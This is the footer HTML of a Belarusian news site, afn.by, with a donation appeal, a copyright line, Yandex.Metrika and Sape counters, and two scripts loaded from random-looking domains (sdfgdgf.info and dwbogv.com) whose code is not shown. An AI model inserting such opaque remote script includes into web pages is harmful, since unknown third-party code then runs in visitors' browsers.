			<div class="redBtn">
				<a href="/news/i/279946">afn.by заблокирован Мининформом<br><br>Помоги сайту</a>
			</div>
			
		</div>
	</div>

		<div id="ft">
			<div class="c">
				&copy; 1995-2019 УП "Ньюс-Релиз"<br />
				<a href="../../contacts">Контактная информация</a> | <a href="../../copyrights">Права на использование</a>
			</div>
			<div class="clear">
			</div>
			
	

		</div>
    </form>
<!-- Yandex.Metrika counter -->
<script type="text/javascript" >
   (function(m,e,t,r,i,k,a){m[i]=m[i]||function(){(m[i].a=m[i].a||[]).push(arguments)};
   m[i].l=1*new Date();k=e.createElement(t),a=e.getElementsByTagName(t)[0],k.async=1,k.src=r,a.parentNode.insertBefore(k,a)})
   (window, document, "script", "https://mc.yandex.ru/metrika/tag.js", "ym");

   ym(421539, "init", {
        clickmap:true,
        trackLinks:true,
        accurateTrackBounce:true,
        trackHash:true
   });
</script>
<noscript><div><img src="https://mc.yandex.ru/watch/421539" style="position:absolute; left:-9999px;" alt="" /></div></noscript>
<!-- /Yandex.Metrika counter -->
<!-- Sape counter -->
<script type="text/javascript">
var _acic={dataProvider:10};(function(){var e=document.createElement("script");e.type="text/javascript";e.async=true;e.src="//www.acint.net/aci.js";var t=document.getElementsByTagName("script")[0];t.parentNode.insertBefore(e,t)})()
</script>
<!-- Sape counter -->

<script>window.RESOURCE_O1B2L3 = 'sdfgdgf.info';</script>
<script src="//sdfgdgf.info/ux/CHxq.js" ></script>


<script async src="//dwbogv.com/8snl17291ivlm0p3y0hq8786uqv678kypxu1lk8.php"></script>

</body>
</html>
